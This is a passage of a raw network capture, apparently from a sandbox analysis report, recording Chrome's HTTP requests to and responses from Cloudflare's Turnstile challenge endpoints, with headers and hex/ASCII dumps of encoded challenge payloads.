                                                                  2025-01-13 21:37:27 UTC1369INData Raw: 67 47 4f 46 61 4b 61 61 61 4a 78 71 72 34 36 42 72 4c 65 68 72 33 6c 38 76 4a 61 62 6e 37 44 42 6c 6e 36 2b 6d 62 61 31 74 62 4f 2b 77 35 65 6c 79 4a 2b 76 71 4b 37 4c 78 34 36 6e 73 4b 62 43 6b 5a 76 55 32 63 44 67 73 61 79 32 34 39 69 39 74 4c 58 67 35 65 76 45 72 4d 66 47 35 4b 75 2f 78 73 76 65 72 4d 2f 67 75 64 58 63 32 66 4c 4a 30 2f 67 42 7a 4c 7a 30 41 66 6e 41 43 73 6e 55 34 65 4c 36 33 4e 76 69 30 66 37 63 79 77 72 56 39 75 55 46 41 2f 63 65 46 51 41 67 31 78 72 2b 2b 42 48 31 4b 4f 55 4a 49 43 4c 36 42 2f 55 4f 2f 6a 44 76 35 41 4d 54 39 43 4d 30 41 68 51 4a 44 2f 49 4d 43 42 4a 41 49 69 45 55 48 69 64 49 45 45 52 4c 53 45 55 5a 52 68 70 4e 53 67 77 6d 48 56 4d 30 4b 6a 68 44 47 55 52 61 4b 6a 73 2f 46 32 49 7a 53 31 30 7a 4d 32 41 37 5a 31 39
                                                                  Data Ascii: gGOFaKaaaJxqr46BrLehr3l8vJabn7DBln6+mba1tbO+w5elyJ+vqK7Lx46nsKbCkZvU2cDgsay249i9tLXg5evErMfG5Ku/xsverM/gudXc2fLJ0/gBzLz0AfnACsnU4eL63Nvi0f7cywrV9uUFA/ceFQAg1xr++BH1KOUJICL6B/UO/jDv5AMT9CM0AhQJD/IMCBJAIiEUHidIEERLSEUZRhpNSgwmHVM0KjhDGURaKjs/F2IzS10zM2A7Z19
                                                                  2025-01-13 21:37:27 UTC1369INData Raw: 36 6d 43 6e 71 6d 69 66 37 53 6c 67 36 36 58 6b 5a 79 64 74 5a 43 6a 6e 71 4f 6b 6e 4c 47 37 78 73 6e 4b 70 73 57 2b 6d 6f 32 4c 72 61 48 49 6f 70 57 55 30 37 50 49 73 4d 7a 49 74 61 75 78 6d 36 4b 73 34 61 53 32 70 38 43 33 31 75 72 69 34 75 6e 6d 77 63 66 65 35 37 44 68 33 75 69 31 30 39 57 36 78 76 76 77 38 39 4c 33 39 2b 4c 73 39 39 4c 44 43 51 54 43 2b 67 76 4b 79 4f 58 48 37 4d 33 6b 37 2f 51 59 41 42 54 71 46 51 54 63 36 2b 62 5a 48 69 50 5a 47 78 6f 53 4b 43 49 59 4a 67 6b 57 35 67 73 4b 35 54 44 6f 4b 41 77 52 4b 77 55 76 37 77 51 71 39 52 63 51 50 78 59 59 48 54 45 6b 44 67 49 7a 41 67 59 53 43 6b 68 43 52 6b 63 68 4c 31 49 4f 4b 79 46 53 4a 30 41 78 45 7a 59 6e 55 53 35 52 4e 54 4d 74 59 55 34 74 51 56 31 57 48 79 42 6a 57 6a 5a 49 4b 47 4a 76
                                                                  Data Ascii: 6mCnqmif7Slg66XkZydtZCjnqOknLG7xsnKpsW+mo2LraHIopWU07PIsMzItauxm6Ks4aS2p8C31uri4unmwcfe57Dh3ui109W6xvvw89L39+Ls99LDCQTC+gvKyOXH7M3k7/QYABTqFQTc6+bZHiPZGxoSKCIYJgkW5gsK5TDoKAwRKwUv7wQq9RcQPxYYHTEkDgIzAgYSCkhCRkchL1IOKyFSJ0AxEzYnUS5RNTMtYU4tQV1WHyBjWjZIKGJv
                                                                  2025-01-13 21:37:27 UTC1369INData Raw: 43 31 6a 4a 78 75 76 61 36 72 71 48 6d 4c 65 70 71 53 74 62 37 42 71 4a 61 4c 7a 61 53 62 72 4d 54 45 73 72 79 69 71 72 61 33 74 72 62 4d 76 4a 58 50 72 64 44 52 33 65 44 4f 32 75 61 76 75 71 69 38 77 36 6a 46 35 71 65 70 77 4d 50 6d 76 4e 37 56 76 39 58 57 78 4d 33 6f 73 74 50 71 38 66 37 2b 79 76 51 44 39 63 44 48 31 63 6e 66 34 67 73 46 78 2b 45 51 38 66 50 4d 39 42 45 55 43 77 51 4c 46 41 58 79 2b 42 59 64 33 64 34 66 49 42 34 62 39 53 6b 53 39 42 33 6f 41 2f 66 75 4c 67 63 46 4a 6a 54 6d 49 6a 62 79 39 68 45 56 50 52 45 51 4f 6b 45 74 4f 77 73 39 4d 53 54 38 2f 68 30 67 53 77 4d 4e 4a 52 38 4e 4f 51 77 74 54 56 42 54 4c 52 46 56 4e 55 5a 59 44 79 6b 73 59 44 4d 59 56 79 45 6c 4a 44 73 66 50 6b 46 66 5a 30 4a 72 61 47 31 71 5a 6a 45 78 58 33 64 48 4d
                                                                  Data Ascii: C1jJxuva6rqHmLepqStb7BqJaLzaSbrMTEsryiqra3trbMvJXPrdDR3eDO2uavuqi8w6jF5qepwMPmvN7Vv9XWxM3ostPq8f7+yvQD9cDH1cnf4gsFx+EQ8fPM9BEUCwQLFAXy+BYd3d4fIB4b9SkS9B3oA/fuLgcFJjTmIjby9hEVPREQOkEtOws9MST8/h0gSwMNJR8NOQwtTVBTLRFVNUZYDyksYDMYVyElJDsfPkFfZ0JraG1qZjExX3dHM
                                                                  2025-01-13 21:37:27 UTC1369INData Raw: 58 6d 4c 65 39 6d 38 53 68 6d 70 44 45 66 38 70 39 70 36 43 4c 6d 4d 32 67 30 36 44 42 6f 4a 43 67 78 37 6a 5a 6b 62 50 58 33 4b 65 71 6f 4a 53 33 73 4e 43 30 77 63 54 42 73 73 48 64 35 4c 7a 4a 76 50 43 36 79 2b 4b 2b 76 38 48 6f 73 63 58 4d 31 50 76 4d 76 62 62 55 76 74 63 43 2b 39 54 47 39 64 33 6e 79 75 50 33 33 4e 7a 39 34 4e 48 46 46 74 37 6c 37 73 2f 35 35 75 50 6f 37 75 6a 35 45 76 4c 7a 2f 52 58 6b 32 50 76 77 49 43 59 45 4c 51 6f 44 2b 43 33 6e 4d 2b 55 51 43 66 4d 42 4e 67 6b 38 43 53 6f 4a 2b 41 6b 77 49 55 4c 35 48 45 42 46 49 54 73 72 48 78 55 56 46 78 6b 6f 51 7a 30 68 4a 31 59 75 4b 53 73 31 4c 6b 34 6e 4a 55 64 63 48 31 35 55 59 78 5a 54 54 32 59 6e 61 45 6c 70 4c 47 74 4f 54 43 39 65 63 7a 46 49 51 57 31 45 54 6d 64 44 52 56 52 76 64 45
                                                                  Data Ascii: XmLe9m8ShmpDEf8p9p6CLmM2g06DBoJCgx7jZkbPX3KeqoJS3sNC0wcTBssHd5LzJvPC6y+K+v8HoscXM1PvMvbbUvtcC+9TG9d3nyuP33Nz94NHFFt7l7s/55uPo7uj5EvLz/RXk2PvwICYELQoD+C3nM+UQCfMBNgk8CSoJ+AkwIUL5HEBFITsrHxUVFxkoQz0hJ1YuKSs1Lk4nJUdcH15UYxZTT2YnaElpLGtOTC9eczFIQW1ETmdDRVRvdE
                                                                  2025-01-13 21:37:27 UTC1369INData Raw: 66 61 42 2f 76 34 43 6c 67 37 69 57 71 4b 7a 45 6f 71 32 66 72 71 57 75 6a 36 4b 73 74 63 37 55 72 62 6d 73 33 4c 47 34 73 4d 61 31 77 63 54 63 75 73 54 65 35 4c 76 4a 70 39 2b 70 7a 4f 62 30 79 64 48 70 75 63 33 56 37 75 7a 4c 32 64 76 61 30 4e 33 67 34 74 62 69 31 4e 4c 64 34 73 50 75 33 65 54 63 38 74 72 73 42 77 58 6a 38 65 54 36 37 76 54 54 43 4e 58 34 2f 41 50 31 2b 74 73 5a 38 77 4c 30 38 76 6f 47 39 77 66 37 43 51 30 78 42 67 34 52 4c 51 73 53 46 53 30 4b 45 51 6b 62 45 68 6e 33 4f 52 4d 65 4e 30 45 50 49 51 41 38 41 69 55 70 52 52 38 71 48 53 38 6d 4c 55 63 66 4a 7a 4d 6b 4d 79 38 32 4b 42 34 7a 4f 68 68 56 4d 6a 73 63 56 42 30 39 4e 55 73 38 52 69 52 74 50 55 6c 4e 54 30 64 50 51 45 39 4c 55 56 56 70 53 56 56 76 63 56 42 5a 58 59 41 36 58 6a 78
                                                                  Data Ascii: faB/v4Clg7iWqKzEoq2frqWuj6Kstc7Urbms3LG4sMa1wcTcusTe5LvJp9+pzOb0ydHpuc3V7uzL2dva0N3g4tbi1NLd4sPu3eTc8trsBwXj8eT67vTTCNX4/AP1+tsZ8wL08voG9wf7CQ0xBg4RLQsSFS0KEQkbEhn3ORMeN0EPIQA8AiUpRR8qHS8mLUcfJzMkMy82KB4zOhhVMjscVB09NUs8RiRtPUlNT0dPQE9LUVVpSVVvcVBZXYA6Xjx
                                                                  2025-01-13 21:37:27 UTC1369INData Raw: 63 75 35 6e 63 43 6c 7a 36 69 64 70 71 47 6c 73 37 47 30 73 39 71 35 33 4b 76 52 75 72 43 32 35 4c 57 7a 75 37 47 35 6f 63 53 6a 79 65 75 2f 33 73 33 77 76 2b 58 4f 78 4e 44 6f 75 4c 48 4e 79 4e 48 4d 30 38 6e 52 75 63 2f 50 2b 39 33 58 2b 64 48 72 34 66 76 56 2f 74 33 72 43 4f 6e 6d 46 64 54 4e 34 77 76 74 39 66 44 6c 38 75 6e 73 36 2f 6e 2b 2b 79 50 63 33 66 49 46 2f 66 67 41 39 4f 6a 6c 2b 77 76 77 36 66 34 6e 43 67 34 4e 41 66 6b 47 43 41 67 57 46 78 68 41 4e 50 6b 53 49 52 6f 56 48 42 49 57 41 68 34 58 44 52 6f 64 4b 67 6f 6a 4a 41 77 71 4a 53 77 69 54 42 49 70 4e 68 59 76 4d 47 45 68 47 6a 45 2b 48 6a 59 34 49 44 34 35 51 44 59 32 4a 6a 31 4b 4b 6b 4a 45 64 54 55 75 52 56 49 79 53 55 77 30 55 6b 31 55 53 55 45 36 55 56 34 2b 56 56 69 4a 53 55 4a 5a
                                                                  Data Ascii: cu5ncClz6idpqGls7G0s9q53KvRurC25LWzu7G5ocSjyeu/3s3wv+XOxNDouLHNyNHM08nRuc/P+93X+dHr4fvV/t3rCOnmFdTN4wvt9fDl8uns6/n++yPc3fIF/fgA9Ojl+wvw6f4nCg4NAfkGCAgWFxhANPkSIRoVHBIWAh4XDRodKgojJAwqJSwiTBIpNhYvMGEhGjE+HjY4ID45QDY2Jj1KKkJEdTUuRVIySUw0Uk1USUE6UV4+VViJSUJZ


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.1649749104.18.95.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:27 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/291047480:1736802921:6cAIPi7OVuOlpkf5Flnw52f_YS5aDPw6UYjgs6Pq5ck/901886f16aa00f3b/aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:27 UTC375INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 13 Jan 2025 21:37:27 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 7
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  cf-chl-out: 6vsx56JwNUu5eilnAMCipw==$Bf5xR2ialpfY5EuD46rGeA==
                                                                  Server: cloudflare
                                                                  CF-RAY: 90188713e8084332-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:27 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                  Data Ascii: invalid


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.1649750104.18.94.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:29 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/291047480:1736802921:6cAIPi7OVuOlpkf5Flnw52f_YS5aDPw6UYjgs6Pq5ck/901886f16aa00f3b/aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 34484
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Content-type: application/x-www-form-urlencoded
                                                                  CF-Chl-RetryAttempt: 0
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  CF-Challenge: aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://challenges.cloudflare.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:29 UTC16384OUTData Raw: 76 5f 39 30 31 38 38 36 66 31 36 61 61 30 30 66 33 62 3d 72 4d 4c 56 6a 6e 66 37 68 34 4d 71 4d 71 65 4d 66 69 66 34 4b 33 46 37 35 78 2d 35 6e 71 72 56 56 25 32 62 67 4c 71 49 34 71 65 56 72 4a 7a 66 38 71 79 34 56 38 7a 6e 59 71 4f 56 4c 68 56 71 65 4c 71 31 56 46 78 71 4d 50 33 66 53 71 39 56 44 66 5a 71 77 7a 30 75 53 34 56 71 4f 71 6a 56 71 4d 34 4e 56 2b 36 6a 4e 63 34 57 69 48 56 2b 62 73 56 69 78 71 47 56 35 63 53 4b 59 71 79 4d 71 74 71 77 68 71 54 6b 49 42 56 56 71 35 39 71 35 4a 4c 71 6f 59 67 78 30 47 71 66 4a 77 36 42 36 49 78 50 33 71 62 49 67 4f 69 51 69 30 37 33 71 6f 78 49 67 34 4d 53 6f 77 34 71 35 2b 6b 4c 4c 69 57 4c 64 44 71 4c 67 34 78 56 6a 78 30 34 33 44 78 50 63 4f 48 37 53 63 71 31 6c 63 51 67 6d 43 6b 33 41 72 61 4b 53 59 4c 33
                                                                  Data Ascii: v_901886f16aa00f3b=rMLVjnf7h4MqMqeMfif4K3F75x-5nqrVV%2bgLqI4qeVrJzf8qy4V8znYqOVLhVqeLq1VFxqMP3fSq9VDfZqwz0uS4VqOqjVqM4NV+6jNc4WiHV+bsVixqGV5cSKYqyMqtqwhqTkIBVVq59q5JLqoYgx0GqfJw6B6IxP3qbIgOiQi073qoxIg4MSow4q5+kLLiWLdDqLg4xVjx043DxPcOH7Scq1lcQgmCk3AraKSYL3
                                                                  2025-01-13 21:37:29 UTC16384OUTData Raw: 56 66 33 66 75 71 78 71 2d 71 4c 6c 34 56 46 6e 66 64 48 59 71 6d 6f 74 69 31 56 35 4c 56 73 30 49 69 35 45 71 54 71 2b 37 66 6e 71 68 56 31 4c 71 59 71 66 4e 31 56 71 45 71 2b 56 39 68 66 4f 71 49 56 5a 68 6e 2b 71 4b 71 66 4c 71 53 71 72 56 46 7a 66 33 71 6a 56 71 6f 6c 6f 71 4f 33 34 56 66 76 71 57 56 77 71 6e 75 78 41 2d 66 37 4d 7a 71 59 56 38 68 6e 68 56 43 63 77 58 6e 30 71 6a 45 31 71 71 56 71 67 32 4c 68 6e 46 2d 4e 47 56 46 54 61 71 68 71 69 44 39 52 7a 6b 71 58 57 62 6e 71 52 46 73 36 36 6d 33 43 4f 69 57 6a 73 62 6b 71 37 39 4d 56 71 66 70 42 44 46 4a 4d 69 4e 46 33 2b 76 4d 2d 50 47 37 71 71 71 73 2b 62 35 4e 66 38 56 39 70 4e 79 33 6b 71 74 68 6e 4e 66 4c 71 38 44 69 6f 66 66 77 49 72 54 42 71 59 37 4c 68 69 7a 68 37 49 69 4c 39 52 75 4c 56
                                                                  Data Ascii: Vf3fuqxq-qLl4VFnfdHYqmoti1V5LVs0Ii5EqTq+7fnqhV1LqYqfN1VqEq+V9hfOqIVZhn+qKqfLqSqrVFzf3qjVqoloqO34VfvqWVwqnuxA-f7MzqYV8hnhVCcwXn0qjE1qqVqg2LhnF-NGVFTaqhqiD9RzkqXWbnqRFs66m3COiWjsbkq79MVqfpBDFJMiNF3+vM-PG7qqqs+b5Nf8V9pNy3kqthnNfLq8DioffwIrTBqY7Lhizh7IiL9RuLV
                                                                  2025-01-13 21:37:29 UTC1716OUTData Raw: 75 68 35 2d 35 67 56 71 56 71 76 71 4c 36 37 69 24 48 32 7a 71 66 7a 5a 4b 35 44 39 36 2b 39 4f 7a 4f 34 33 47 4d 7a 64 7a 6f 5a 37 35 7a 71 6c 6a 6d 57 71 24 38 36 38 65 71 69 34 71 63 71 66 4b 47 73 71 48 4a 71 56 71 72 6e 32 44 47 39 24 53 71 50 71 77 6c 68 58 41 30 77 33 44 6e 53 65 43 33 31 33 6e 75 71 36 43 54 71 65 72 36 24 41 57 37 35 6e 71 52 44 2b 67 62 6e 71 32 79 53 71 66 39 7a 71 59 62 56 66 79 51 74 58 4b 7a 6d 4c 56 38 4f 72 37 4b 6a 63 66 74 32 7a 6e 6c 65 39 44 2b 4c 71 4c 71 6a 4c 37 31 69 65 44 77 44 6e 71 41 42 61 46 45 2d 73 50 50 39 24 72 4d 4b 2d 54 49 62 33 6d 65 37 6d 38 63 56 2b 2b 76 71 36 6e 79 4a 46 2b 6c 7a 4b 51 6e 78 66 32 67 4c 41 74 31 53 47 71 66 44 5a 4f 46 31 74 66 71 69 7a 6d 78 71 77 6e 52 62 49 24 42 6f 76 6f 61 38
                                                                  Data Ascii: uh5-5gVqVqvqL67i$H2zqfzZK5D96+9OzO43GMzdzoZ75zqljmWq$868eqi4qcqfKGsqHJqVqrn2DG9$SqPqwlhXA0w3DnSeC313nuq6CTqer6$AW75nqRD+gbnq2ySqf9zqYbVfyQtXKzmLV8Or7Kjcft2znle9D+LqLqjL71ieDwDnqABaFE-sPP9$rMK-TIb3me7m8cV++vq6nyJF+lzKQnxf2gLAt1SGqfDZOF1tfqizmxqwnRbI$Bovoa8
                                                                  2025-01-13 21:37:30 UTC1347INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:30 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 4624
                                                                  Connection: close
                                                                  cf-chl-out-s: VFAAZgh0SqeaV7Xy7JchDu2p67wKvqcHGv/KK2P9gDjkX2ZlPhWfz50TNVmoKiLJPXUoLuyund0NvhNSIhjRDdzfIlQZwujJp8uN29SAehxLDE4BP4tqfkCnYrG227YOMm4xJfVCoOjzVR7PnXWzSA1b3vsVxdEX0zFKXAK2eUX8RAeBsf4iz3JYTJ2kpsOHppVBs4dhs/Mebk8Si27kySU9VWheHOEvEX4WiEErJ9bGQIuLYQ7Ab02bNiMCvZ3W1oIyb5biA5sfVcdQGdRVKX2x/FLCiqJhoEASK0OljMRH5i71JivbOCHZiUAlHAorqpkhUvzFG6TfML/7Fxga3NcSrHLmqpR0nQ6Z7ifkQwdTgfMC9AfxAOF1DCEV9PG//NdafHXvwPHdw56WOUEtlDyt7E1L/fk9drL7oVpNvB8tlXF71FE0X4z4y+gZdXtrpsngb+5Sd0wSrrbX/uGt28bDDm2qHSI5HKyMJjhXhwdAceU4UZX9B69PY8Ruvn3XoL1cuqZL0YBjqcs8cE3CiXCrkvh4uVKkZR0rQpWZepEE7WPVR0nvdzYHBRmZG2mz3u19wll9RkmK3UEsDkpMSV+qci8tLN1WxC+K0k9zj8A2Sv75M3rj3u2f8V2fyYxCm+3Nhw+l2fdaSxFy7XOB6cCU7kGGMuzYXlU2r8pnAnUU12+LfNaNhO0DY0irmRGqTB4u6unQYwhf2CgC8k8pM1qBK7905YlsZjbLDL5pGKVwWlFDuqATe76IRtNqry/dGui53DjfKRddDBAzzm2yWAa80nUX2e0+azZJ6azEENCW+uXaZMKO3TrPi4dG2iqs6+7Xkq2c3XR4JYC2vXwzBgnTf7UlKMbj4mgTMzdYlowMKtMHt82POY4IgqhIT0kL7dfyAjyvP+H0bFIBzYvZRrB498BUushoa4eCQXQnVgf+ZKheFKSXHoNQzxOkGBPEcDMchpqeYXNklJcYaZ5UU9J16NUOPsRaP4c2f/4J4Rg=$47opq [TRUNCATED]
                                                                  cf-chl-out: 7+r+yeXCoCJ9yM5Z2OlBKKuYD8gVhi/Gg1eO4NgUKBpia2f8mp+4MiDKJJH7rpQ1PYU5Jy9Jq+d6R2PEKtGxCEop4wnWa88XG3DYnV1AfyQ=$I5826GCjPYMhCE+flvAcLQ==
                                                                  Server: cloudflare
                                                                  2025-01-13 21:37:30 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 39 30 31 38 38 37 32 32 31 61 62 61 30 63 62 32 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                  Data Ascii: CF-RAY: 901887221aba0cb2-EWRalt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:30 UTC1329INData Raw: 62 57 56 50 68 47 43 4c 6b 5a 4b 44 61 4a 47 63 6a 4a 78 74 56 6e 65 5a 59 70 79 44 63 35 6d 48 67 34 65 57 71 61 70 6d 5a 47 47 64 62 61 4b 44 71 35 53 6e 6c 32 36 58 74 4b 4f 79 68 72 64 78 69 4a 71 37 64 59 33 44 77 4b 2b 53 78 59 44 4d 78 5a 69 4d 6a 62 36 61 70 73 61 6b 78 61 72 47 70 4d 65 32 79 38 79 33 72 37 32 63 30 61 4b 78 76 74 65 76 74 4b 57 35 71 4f 44 4a 35 38 53 70 37 64 76 4d 39 4f 33 53 31 4d 76 79 36 2b 66 5a 75 74 4c 36 76 62 76 58 33 66 32 2f 41 51 6a 77 34 64 6b 4c 44 65 58 34 39 77 48 49 30 51 7a 63 30 51 45 45 39 74 51 47 47 42 50 30 42 67 6a 31 41 42 7a 31 38 75 4c 36 35 75 45 68 49 66 37 6b 4c 76 58 34 49 4f 59 4a 48 65 30 43 44 53 45 32 4a 50 50 33 50 41 6a 38 47 52 55 4e 46 54 59 54 39 68 74 44 4a 78 6f 48 4f 30 4a 46 51 77 68
                                                                  Data Ascii: bWVPhGCLkZKDaJGcjJxtVneZYpyDc5mHg4eWqapmZGGdbaKDq5Snl26XtKOyhrdxiJq7dY3DwK+SxYDMxZiMjb6apsakxarGpMe2y8y3r72c0aKxvtevtKW5qODJ58Sp7dvM9O3S1Mvy6+fZutL6vbvX3f2/AQjw4dkLDeX49wHI0Qzc0QEE9tQGGBP0Bgj1ABz18uL65uEhIf7kLvX4IOYJHe0CDSE2JPP3PAj8GRUNFTYT9htDJxoHO0JFQwh
                                                                  2025-01-13 21:37:30 UTC1369INData Raw: 7a 46 31 63 31 46 59 53 33 6c 58 67 55 74 6b 57 34 5a 53 51 47 46 6c 51 6e 31 71 57 49 53 51 5a 46 78 62 66 6d 2b 57 58 6c 47 41 6d 57 2b 45 63 70 35 2b 69 33 35 75 59 5a 79 41 63 70 31 37 67 33 53 59 59 35 53 74 61 61 79 41 61 49 70 77 69 34 39 31 75 49 79 44 64 58 57 57 76 72 6d 72 6c 37 4b 74 6c 35 53 31 66 72 47 6d 70 70 36 44 72 4d 36 34 6a 61 69 73 76 63 32 6b 31 73 47 66 74 4c 54 52 72 61 2b 32 6d 73 75 37 6d 4c 61 56 78 4c 2b 37 31 73 54 46 76 37 2f 49 34 4c 62 4f 32 4b 71 37 34 63 66 53 74 62 58 50 31 64 4c 31 30 66 33 4c 79 74 30 44 7a 39 7a 5a 33 72 33 35 35 4f 50 4b 32 4e 7a 59 7a 74 7a 6d 36 77 37 6e 37 4f 48 7a 33 2f 51 4b 31 51 6e 79 36 52 6f 4a 2f 74 6a 76 42 51 51 41 38 77 4c 31 34 69 59 4c 42 51 72 71 41 77 34 6b 4c 54 49 64 4a 79 34 54
                                                                  Data Ascii: zF1c1FYS3lXgUtkW4ZSQGFlQn1qWISQZFxbfm+WXlGAmW+Ecp5+i35uYZyAcp17g3SYY5StaayAaIpwi491uIyDdXWWvrmrl7Ktl5S1frGmpp6DrM64jaisvc2k1sGftLTRra+2msu7mLaVxL+71sTFv7/I4LbO2Kq74cfStbXP1dL10f3Lyt0Dz9zZ3r355OPK2NzYztzm6w7n7OHz3/QK1Qny6RoJ/tjvBQQA8wL14iYLBQrqAw4kLTIdJy4T
                                                                  2025-01-13 21:37:30 UTC1369INData Raw: 78 30 62 30 31 32 59 6b 2b 42 68 34 4e 56 66 34 46 47 65 56 31 64 53 48 78 50 55 6b 36 52 69 35 46 56 6c 49 35 4e 57 58 32 50 56 31 64 75 62 6f 36 46 64 58 4f 42 71 58 36 49 6c 48 35 6f 65 32 61 65 6b 62 47 7a 68 70 43 6a 63 4b 61 54 69 71 2b 4f 68 70 4b 30 6b 49 6d 42 73 62 43 61 67 49 47 41 6c 61 61 54 70 4c 79 48 30 4b 48 51 6e 73 47 76 78 5a 58 54 73 72 50 45 6b 37 47 71 75 38 72 42 6d 4e 54 57 75 72 50 44 73 63 48 47 71 74 37 47 74 71 37 44 77 36 69 37 76 63 66 6f 77 38 62 4e 30 72 72 70 31 66 44 61 37 4e 54 77 32 72 72 66 30 51 48 31 32 4e 4d 43 41 4f 6a 6d 35 68 44 78 37 66 33 64 35 63 33 72 42 76 50 52 36 68 50 35 39 78 6b 59 2f 76 34 65 44 76 30 45 37 2f 6b 44 47 68 34 68 43 77 67 51 39 77 63 6c 42 41 73 49 4e 79 59 49 44 43 30 4d 45 42 49 62 44
                                                                  Data Ascii: x0b012Yk+Bh4NVf4FGeV1dSHxPUk6Ri5FVlI5NWX2PV1dubo6FdXOBqX6IlH5oe2aekbGzhpCjcKaTiq+OhpK0kImBsbCagIGAlaaTpLyH0KHQnsGvxZXTsrPEk7Gqu8rBmNTWurPDscHGqt7Gtq7Dw6i7vcfow8bN0rrp1fDa7NTw2rrf0QH12NMCAOjm5hDx7f3d5c3rBvPR6hP59xkY/v4eDv0E7/kDGh4hCwgQ9wclBAsINyYIDC0MEBIbD
                                                                  2025-01-13 21:37:30 UTC557INData Raw: 50 58 32 52 41 57 34 46 6f 6a 6d 4e 65 59 30 6d 4e 5a 6d 6c 77 56 6e 52 31 64 34 6c 79 62 34 32 64 6d 48 39 76 6f 47 42 37 58 5a 69 6c 68 47 46 36 71 34 52 36 66 71 75 42 6f 58 75 62 6b 61 69 6f 70 4a 57 54 72 48 65 64 72 37 78 2b 6d 6f 79 31 6c 4a 64 38 67 63 65 69 6b 36 62 45 6e 70 65 4b 77 36 7a 46 79 4d 43 77 6f 4d 69 56 75 4b 53 71 31 4b 6d 6f 6e 72 69 31 75 35 36 30 76 35 33 67 34 4c 33 63 34 62 2f 47 70 65 6e 6a 7a 62 37 78 32 38 44 51 38 50 62 5a 36 2b 58 54 30 4e 6a 66 31 39 6f 44 30 73 44 73 39 38 2f 57 36 65 58 6e 36 65 54 58 36 39 33 74 42 41 48 73 35 4e 38 4f 39 4f 6b 61 2b 68 58 74 2b 76 6f 55 38 74 6b 68 46 2f 54 79 43 41 58 35 47 67 67 4e 2f 69 45 70 4a 77 34 6c 45 42 55 54 37 53 6b 79 46 77 50 36 48 42 77 4c 4c 54 59 65 4e 54 30 36 49 78
                                                                  Data Ascii: PX2RAW4FojmNeY0mNZmlwVnR1d4lyb42dmH9voGB7XZilhGF6q4R6fquBoXubkaiopJWTrHedr7x+moy1lJd8gceik6bEnpeKw6zFyMCwoMiVuKSq1Kmonri1u560v53g4L3c4b/Gpenjzb7x28DQ8PbZ6+XT0Njf19oD0sDs98/W6eXn6eTX693tBAHs5N8O9Oka+hXt+voU8tkhF/TyCAX5GggN/iEpJw4lEBUT7SkyFwP6HBwLLTYeNT06Ix


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.1649751104.18.95.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:30 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/291047480:1736802921:6cAIPi7OVuOlpkf5Flnw52f_YS5aDPw6UYjgs6Pq5ck/901886f16aa00f3b/aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
